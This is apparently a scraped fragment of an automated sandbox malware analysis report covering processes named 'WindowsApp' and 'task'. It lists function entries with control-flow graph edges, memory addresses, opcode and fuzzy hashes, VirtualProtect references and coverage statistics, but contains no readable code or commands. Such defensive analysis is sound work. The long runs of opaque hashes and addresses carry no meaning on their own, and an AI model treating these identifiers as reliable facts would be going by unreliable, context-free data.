                                                      control_flow_graph 176 7ffaac4c6ad0-7ffaac4c6b81 179 7ffaac4c6b84-7ffaac4c6bc3 176->179 180 7ffaac4c6b83 176->180 182 7ffaac4c6bc5 179->182 183 7ffaac4c6bca-7ffaac4c6bfb 179->183 180->179 182->183 186 7ffaac4c6c02-7ffaac4c6c26 183->186 187 7ffaac4c6c43-7ffaac4c6c44 186->187 188 7ffaac4c6c28-7ffaac4c6cee 186->188 189 7ffaac4c6e82-7ffaac4c6ea4 187->189 190 7ffaac4c6e5d-7ffaac4c6e7d 187->190 188->186 189->190 195 7ffaac4c6ea6-7ffaac4c6eb6 189->195 190->186 196 7ffaac4c6eb8-7ffaac4c6eba 195->196 197 7ffaac4c6f1d-7ffaac4c6f3e 196->197 198 7ffaac4c6ebc-7ffaac4c6f1c 196->198 199 7ffaac4c6f45-7ffaac4c6f53 197->199 198->197
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c6000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: r6
                                                      • API String ID: 0-2984296541
                                                      • Opcode ID: 74083e38cff0f3695d784e364a9e7ea7e27dd05c9d598f6f2f008b5beaa764e0
                                                      • Instruction ID: d8675fc591e6e08bdf5ecac239c82731851eb2e1d67cba22c74fa5b771582d09
                                                      • Opcode Fuzzy Hash: 74083e38cff0f3695d784e364a9e7ea7e27dd05c9d598f6f2f008b5beaa764e0
                                                      • Instruction Fuzzy Hash: 5C91F07490D7888FEB46DF68C8557D87FF1EF5A300F0580EAC049D72A2DA389849CB90
                                                      Function 00007FFAAC4C07F2 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 253 7ffaac4c07f2-7ffaac4c0825 256 7ffaac4c0826-7ffaac4c0848 253->256 259 7ffaac4c084a-7ffaac4c08c7 256->259 260 7ffaac4c07ce-7ffaac4c07e9 256->260 269 7ffaac4c08c9 259->269 270 7ffaac4c08ce call 7ffaac4c0500 259->270 260->256 264 7ffaac4c07eb-7ffaac4c07f1 260->264 269->270 272 7ffaac4c08d3-7ffaac4c091b 270->272 274 7ffaac4c091d-7ffaac4c093a 272->274 275 7ffaac4c093e-7ffaac4c093f 272->275 274->275
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c0000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: <M_^
                                                      • API String ID: 0-1376500734
                                                      • Opcode ID: bd358660d31fa1f86f4e2c65f11979c1855538394a46cd212ace93bf0bf168fe
                                                      • Instruction ID: a1af23258ceebbd77941e347e0a890c09b1a18a0ff8f4cb80dfd10db79850758
                                                      • Opcode Fuzzy Hash: bd358660d31fa1f86f4e2c65f11979c1855538394a46cd212ace93bf0bf168fe
                                                      • Instruction Fuzzy Hash: 6141D77140E7C98FE7239B2898A56D53FA09F43318F0941BBD099CE1A3DD28554EC7A5
                                                      Function 00007FFAAC4C6C4C Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c6000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: r6
                                                      • API String ID: 0-2984296541
                                                      • Opcode ID: 7ec7a200bed4828ec74c8c504c4686357f04ecd740b481dae529fc8c86e3ab73
                                                      • Instruction ID: e6ca1ddf1092c5b964ca4458a17fefbc5dd561946c02df4f82eb4788d4337323
                                                      • Opcode Fuzzy Hash: 7ec7a200bed4828ec74c8c504c4686357f04ecd740b481dae529fc8c86e3ab73
                                                      • Instruction Fuzzy Hash: 98111970E0960D8FEB99DF68C4A5AECB7F1EB5A300F1081AAC40DE72A1DA3459448F55
                                                      Function 00007FFAAC4C63FD Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c6000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "9
                                                      • API String ID: 0-1061052283
                                                      • Opcode ID: 63eaf7435d3da15181422a2d13685f60a7840fd08a71974c1308ab7fdecc90ac
                                                      • Instruction ID: bf09929d45cf42d3b3762cf9a4151cfb053150971e3bcc01b851dbbd6ba6a52b
                                                      • Opcode Fuzzy Hash: 63eaf7435d3da15181422a2d13685f60a7840fd08a71974c1308ab7fdecc90ac
                                                      • Instruction Fuzzy Hash: 50F04FB1D099598EFB98DB58D855AECBBA1FB14200F10C1BAC00EE7251DE2459818B45
                                                      Function 00007FFAAC4C6604 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c6000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: x
                                                      • API String ID: 0-2216521381
                                                      • Opcode ID: 9d17df742d3575bf7b4941b1db2366a1ffafcf5f3ef6e55d4c5dc1404db13c56
                                                      • Instruction ID: 6f14f4880c7a1878b50493dd2f6db5efc1b2759cbf20ba42554f6702a979cb81
                                                      • Opcode Fuzzy Hash: 9d17df742d3575bf7b4941b1db2366a1ffafcf5f3ef6e55d4c5dc1404db13c56
                                                      • Instruction Fuzzy Hash: A8F01C71D1891B8FF7E4EB28CC5A7E9A6A2FF58200F4084F9904DD2592DE345EC58B80
                                                      Function 00007FFAAC4C48F3 Relevance: .3, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8b7ded2d43819e80e96ab813c61141c5b7c18ed9a1e69314831b3e1428043694
                                                      • Instruction ID: 91c71b4a08b9ce4eef780d049131e518d1c00ee5c88f893126584b474fd67783
                                                      • Opcode Fuzzy Hash: 8b7ded2d43819e80e96ab813c61141c5b7c18ed9a1e69314831b3e1428043694
                                                      • Instruction Fuzzy Hash: 5EB17C7190D7D98FEB56DB3488647A47FB0AF17304F0A40EBC488DB1A3DA345A89CB52
                                                      Function 00007FFAAC4C07C5 Relevance: .1, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c0000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a37a1d779378ebbb8874766cbbac1c4a5921911eb9678141800ecb31b7f875db
                                                      • Instruction ID: 64485e156e3ac0a0d685c36d67ba98123535ee1b49a7b51c29d5609f543986d4
                                                      • Opcode Fuzzy Hash: a37a1d779378ebbb8874766cbbac1c4a5921911eb9678141800ecb31b7f875db
                                                      • Instruction Fuzzy Hash: 6B41D57180E7C98FF7278B2898A52E53FA0AF43308F0941BBD4898F1A3DD285559C795
                                                      Function 00007FFAAC4C2F62 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C2000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c2000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: df5363e339e2ec3be9baa145576007d741eb24dc3f61dccf61deedd7b4ab4b04
                                                      • Instruction ID: c08993a7028bbc879269a4ecf2e05b892f80150f23fc16cafd1626d81d660486
                                                      • Opcode Fuzzy Hash: df5363e339e2ec3be9baa145576007d741eb24dc3f61dccf61deedd7b4ab4b04
                                                      • Instruction Fuzzy Hash: 1E0100B290D68A8FE7B5EF68C8447F83781FF4A304F0084B9C40D8B296DD78A8499384
                                                      Function 00007FFAAC4C2079 Relevance: .0, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C2000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c2000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 442b2fc52093fa5cb302472210339b6fed323d98a1098cedfdd08fa35726b4c2
                                                      • Instruction ID: f4abbdb23814c0331d90da7a94eed2ecfdfb5e4788d433a6e66114504bcdcc9e
                                                      • Opcode Fuzzy Hash: 442b2fc52093fa5cb302472210339b6fed323d98a1098cedfdd08fa35726b4c2
                                                      • Instruction Fuzzy Hash: B9E08C7041E244CBEBBEDF01C851BE83698EB00308F10A02ED90E4A290DB3893048B98
                                                      Function 00007FFAAC4C6DDE Relevance: .0, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c6000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97c256d016cc8b16d40fb23455df81a87d779b90347c28252b4324d7132807ab
                                                      • Instruction ID: 80519e15799200b636bdf5292304f1dae48d83cf0ac7e333727b3f6daa1ac9d7
                                                      • Opcode Fuzzy Hash: 97c256d016cc8b16d40fb23455df81a87d779b90347c28252b4324d7132807ab
                                                      • Instruction Fuzzy Hash: 6CD012309191098FF71DEF64C0428DC7731FB45618F30666DD04B662A2D935A9058A88
                                                      Function 00007FFAAC4C0C96 Relevance: .0, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c0000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7606a0fc62e4e54d8f335c09ac0a4515144289118147727eb48096dbbd6e281a
                                                      • Instruction ID: 0a880604c8904fa9e2819539826a57fc054a1b4e4501e4b9aaae843c44c12088
                                                      • Opcode Fuzzy Hash: 7606a0fc62e4e54d8f335c09ac0a4515144289118147727eb48096dbbd6e281a
                                                      • Instruction Fuzzy Hash: 98C09B3041D34787E77EDF1485577A4765DF705D08F30A01D998B0D1754A305311DA95

                                                      Non-executed Functions

                                                      Function 00007FFAAC4D11A9 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4cb000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,6l
                                                      • API String ID: 0-2998287610
                                                      • Opcode ID: 42d0a9ac9d1cc30ed5179564744a6e8662fee7f5bc253daed3ef27d8df687b8c
                                                      • Instruction ID: e40746a747a07808261cbf21ca7779194001503b8b9c2038a58705b17980dffb
                                                      • Opcode Fuzzy Hash: 42d0a9ac9d1cc30ed5179564744a6e8662fee7f5bc253daed3ef27d8df687b8c
                                                      • Instruction Fuzzy Hash: AB51287290E3854FE31E96395C5A5A17FA5DB8322070982FFD4C6CB1E7E9199C0B83D1
                                                      Function 00007FFAAC4DD7DD Relevance: .6, Instructions: 615COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1f8d815b8dcc8272b34c3e6186c0e5ccb7badf4b5f48917591a62c536fa8a9bc
                                                      • Instruction ID: 10eff803e1f83990e6f073a8109218d326116832d7e683cff3bf98435f15f2df
                                                      • Opcode Fuzzy Hash: 1f8d815b8dcc8272b34c3e6186c0e5ccb7badf4b5f48917591a62c536fa8a9bc
                                                      • Instruction Fuzzy Hash: B8224F70918A8D8FEBB9EF28C859BE977E1FB59301F00412ED84ECB291DE749544CB81
                                                      Function 00007FFAAC4D85D8 Relevance: .3, Instructions: 294COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cf444071cfa23413777e7a9679e85b2fb30b68f6c46106784db9fb35022dd550
                                                      • Instruction ID: 104d23045aa1a20d2fd067ed641296304765780212567082eaeb40e5a5503f0c
                                                      • Opcode Fuzzy Hash: cf444071cfa23413777e7a9679e85b2fb30b68f6c46106784db9fb35022dd550
                                                      • Instruction Fuzzy Hash: B6918F6190F3C19FE30B5B3458656B1BFE4EF53214B1A82EFE089861A3C918980AC3D6
                                                      Function 00007FFAAC4E51A1 Relevance: .2, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2ea3b3c610935d4378413fe69836527e30f54b48be3abef1c2a998a933e86773
                                                      • Instruction ID: 7284ea6f3766976053251706102f04054e9c7d20f565622b92a3a3f119fe3e6f
                                                      • Opcode Fuzzy Hash: 2ea3b3c610935d4378413fe69836527e30f54b48be3abef1c2a998a933e86773
                                                      • Instruction Fuzzy Hash: E2414E7260C60D4FE71CDB68D84B5FA77D6EB86320B10423ED44FC3192EA20A81782C9

                                                      Execution Graph

                                                      Execution Coverage:18.9%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:39
                                                      Total number of Limit Nodes:3
                                                      execution_graph 901 7ffaac4b06f5 902 7ffaac4b070d VirtualProtect 901->902 904 7ffaac4bbe29 902->904 940 7ffaac4b09f8 943 7ffaac4b0570 940->943 942 7ffaac4b0a17 944 7ffaac4b0579 943->944 945 7ffaac4b5c59 VirtualProtect 944->945 947 7ffaac4b05ce 944->947 946 7ffaac4b5cf9 945->946 946->942 947->942 947->947 905 7ffaac4b17e6 908 7ffaac4b0510 905->908 907 7ffaac4b17eb 909 7ffaac4b0515 908->909 910 7ffaac4b5c59 VirtualProtect 909->910 912 7ffaac4b05ce 909->912 911 7ffaac4b5cf9 910->911 911->907 912->907 912->912 913 7ffaac4b0837 915 7ffaac4b083f 913->915 914 7ffaac4b07ce 915->914 918 7ffaac4b0500 915->918 917 7ffaac4b08d3 919 7ffaac4b0505 918->919 920 7ffaac4b5c59 VirtualProtect 919->920 922 7ffaac4b05ce 919->922 921 7ffaac4b5cf9 920->921 921->917 922->917 922->922 935 7ffaac4b04bd 936 7ffaac4b04c5 935->936 937 7ffaac4b5c59 VirtualProtect 936->937 939 7ffaac4b05ce 936->939 938 7ffaac4b5cf9 937->938 939->939 948 7ffaac4b045b 949 7ffaac4b045f 948->949 950 7ffaac4b05ce 949->950 951 7ffaac4b5c59 VirtualProtect 949->951 952 7ffaac4b5cf9 951->952 931 7ffaac4b5b21 932 7ffaac4b5bbe VirtualProtect 931->932 934 7ffaac4b5cf9 932->934

                                                      Executed Functions

                                                      Function 00007FFAAC4B045B Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 371COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?N_^
                                                      • API String ID: 0-1123592777
                                                      • Opcode ID: 83b38461a67910df5c9caea3c323d5a0736b341ffefad1585f36cebea5f76be5
                                                      • Instruction ID: 24d68762c39801dfeb4801c9df915758b74007440714739d7635d03af0ca9290
                                                      • Opcode Fuzzy Hash: 83b38461a67910df5c9caea3c323d5a0736b341ffefad1585f36cebea5f76be5
                                                      • Instruction Fuzzy Hash: 37B14F71A0C7898FEB14DB68D8556FDBFB0FF56325F0482BAD049D7282DA30A845CB81
                                                      Function 00007FFAAC4B06F5 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 322memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: =N_^
                                                      • API String ID: 544645111-3908133570
                                                      • Opcode ID: 5f3480de5d0726b14cb5560605e1c412508ba24ce557a7ce29cbb220d5d761ef
                                                      • Instruction ID: 7da042c05f88d5c34af8da5bfa84d4c49184bc99e28072ba38a925a69667329c
                                                      • Opcode Fuzzy Hash: 5f3480de5d0726b14cb5560605e1c412508ba24ce557a7ce29cbb220d5d761ef
                                                      • Instruction Fuzzy Hash: 1BB18C70D0865C8FDB55DF68D849BE9BBF0FF5A314F0042AAD409D7292DB34A984CB85
                                                      Function 00007FFAAC4B04BD Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 273COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?N_^
                                                      • API String ID: 0-1123592777
                                                      • Opcode ID: 14873b95c5922f5e0b814aa896f9d95540f1a889b861991a112770e6e1ed71a5
                                                      • Instruction ID: d43de4ca0cc67ad262c0e53cc3982101ef4e0662c5b706c1faf84e7c24a58bb3
                                                      • Opcode Fuzzy Hash: 14873b95c5922f5e0b814aa896f9d95540f1a889b861991a112770e6e1ed71a5
                                                      • Instruction Fuzzy Hash: C8812071A0CA5D8FEB54EB5CD8956E9BFF0FF56325F04417AC089D3252DA20A845CB81
                                                      Function 00007FFAAC4B5B21 Relevance: 1.7, APIs: 1, Instructions: 247memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 96 7ffaac4b5b21-7ffaac4b5bbc 97 7ffaac4b5bc1-7ffaac4b5bd1 96->97 98 7ffaac4b5bbe-7ffaac4b5bc0 96->98 99 7ffaac4b5bd4-7ffaac4b5cf7 VirtualProtect 97->99 100 7ffaac4b5bd3 97->100 98->97 104 7ffaac4b5cf9 99->104 105 7ffaac4b5cff-7ffaac4b5d4d 99->105 100->99 104->105
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: ff7b6786057229d707c55daf00ee7e7119f27f56e1462a02c8a85ccccd3da570
                                                      • Instruction ID: 8700e9895a07ccb1e74ca12cc25e4970c5817209ca1c238966f2a9b6750490d9
                                                      • Opcode Fuzzy Hash: ff7b6786057229d707c55daf00ee7e7119f27f56e1462a02c8a85ccccd3da570
                                                      • Instruction Fuzzy Hash: EA819D7080D7888FDB06DF688865AE9BFB0EF17305F1541EFC089D7293DA64A945CB52
                                                      Function 00007FFAAC4B0500 Relevance: 1.7, APIs: 1, Instructions: 241COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 107 7ffaac4b0500-7ffaac4b0541 112 7ffaac4b0582 107->112 113 7ffaac4b0543-7ffaac4b057f 107->113 115 7ffaac4b0584-7ffaac4b5cf7 VirtualProtect 112->115 116 7ffaac4b05ce-7ffaac4b793d 112->116 113->112 130 7ffaac4b5cf9 115->130 131 7ffaac4b5cff-7ffaac4b5d4d 115->131 122 7ffaac4b7944-7ffaac4b794e 116->122 123 7ffaac4b793f 116->123 125 7ffaac4b7954-7ffaac4b797a 122->125 126 7ffaac4b7a22-7ffaac4b7a2a 122->126 123->122 128 7ffaac4b7997-7ffaac4b7998 125->128 129 7ffaac4b797c-7ffaac4b7993 125->129 128->126 133 7ffaac4b7995 129->133 130->131 133->133
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7863885df780f3b15bb8a033c226912a12788c55c2e95da644b1293911d4b7c7
                                                      • Instruction ID: 7e28a6b761d6ef2257d2a7447bebaf084d630a8876fafbd4d1f595bf37856f78
                                                      • Opcode Fuzzy Hash: 7863885df780f3b15bb8a033c226912a12788c55c2e95da644b1293911d4b7c7
                                                      • Instruction Fuzzy Hash: D271CD71A0CB5D8FEB54DF58D899AE9BFF0FB56315F0042AAC049D7252DB30A885CB81
                                                      Function 00007FFAAC4B0510 Relevance: 1.7, APIs: 1, Instructions: 232COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 134 7ffaac4b0510-7ffaac4b0541 138 7ffaac4b0582 134->138 139 7ffaac4b0543-7ffaac4b057f 134->139 141 7ffaac4b0584-7ffaac4b5cf7 VirtualProtect 138->141 142 7ffaac4b05ce-7ffaac4b793d 138->142 139->138 156 7ffaac4b5cf9 141->156 157 7ffaac4b5cff-7ffaac4b5d4d 141->157 148 7ffaac4b7944-7ffaac4b794e 142->148 149 7ffaac4b793f 142->149 151 7ffaac4b7954-7ffaac4b797a 148->151 152 7ffaac4b7a22-7ffaac4b7a2a 148->152 149->148 154 7ffaac4b7997-7ffaac4b7998 151->154 155 7ffaac4b797c-7ffaac4b7993 151->155 154->152 159 7ffaac4b7995 155->159 156->157 159->159
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a07b933046cccdc8ffe34b9e3cee8a669fd7b35c14a224f19cabc0b8946bf7b
                                                      • Instruction ID: 89b929dd66045b1b205e525009020a84b66f9128b70c81649891d4a1fe7ad1b4
                                                      • Opcode Fuzzy Hash: 4a07b933046cccdc8ffe34b9e3cee8a669fd7b35c14a224f19cabc0b8946bf7b
                                                      • Instruction Fuzzy Hash: 4D61DD7190CB5D8FEB54DF58D899AE9BFF0FB56315F0042AAC049D7252DB30A885CB81
                                                      Function 00007FFAAC4B0550 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 160 7ffaac4b0550-7ffaac4b0582 165 7ffaac4b0584-7ffaac4b5cf7 VirtualProtect 160->165 166 7ffaac4b05ce-7ffaac4b793d 160->166 178 7ffaac4b5cf9 165->178 179 7ffaac4b5cff-7ffaac4b5d4d 165->179 170 7ffaac4b7944-7ffaac4b794e 166->170 171 7ffaac4b793f 166->171 173 7ffaac4b7954-7ffaac4b797a 170->173 174 7ffaac4b7a22-7ffaac4b7a2a 170->174 171->170 176 7ffaac4b7997-7ffaac4b7998 173->176 177 7ffaac4b797c-7ffaac4b7993 173->177 176->174 181 7ffaac4b7995 177->181 178->179 181->181
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a619fcccc49efc5d304b3604dd23ba914ee60437a735ef43a875f70d50b31695
                                                      • Instruction ID: 1133b5e55883d50db39773b306a892c4942a3ad535da49521144dc9b33d8ce84
                                                      • Opcode Fuzzy Hash: a619fcccc49efc5d304b3604dd23ba914ee60437a735ef43a875f70d50b31695
                                                      • Instruction Fuzzy Hash: D7516D7090864C8FDB54DF58D895BEDBBF0FB59315F10426ED04AE3252DB30A985CB85
                                                      Function 00007FFAAC4B0570 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 182 7ffaac4b0570-7ffaac4b0582 185 7ffaac4b0584-7ffaac4b5cf7 VirtualProtect 182->185 186 7ffaac4b05ce-7ffaac4b793d 182->186 198 7ffaac4b5cf9 185->198 199 7ffaac4b5cff-7ffaac4b5d4d 185->199 190 7ffaac4b7944-7ffaac4b794e 186->190 191 7ffaac4b793f 186->191 193 7ffaac4b7954-7ffaac4b797a 190->193 194 7ffaac4b7a22-7ffaac4b7a2a 190->194 191->190 196 7ffaac4b7997-7ffaac4b7998 193->196 197 7ffaac4b797c-7ffaac4b7993 193->197 196->194 201 7ffaac4b7995 197->201 198->199 201->201
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70bddcf552aa13497c074f4f0a0a8b69a84c580f40e83231ce0f3120c72d50c7
                                                      • Instruction ID: 3d95dff265a1036839914357c53826c23fc010b104cad5b6cfd6fef16cb352af
                                                      • Opcode Fuzzy Hash: 70bddcf552aa13497c074f4f0a0a8b69a84c580f40e83231ce0f3120c72d50c7
                                                      • Instruction Fuzzy Hash: 75516C74908A0C8FDB58DF58D889BEDBBF1FB69315F10426ED04AE3251DB30A985CB85

                                                      Execution Graph

                                                      Execution Coverage:20.1%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
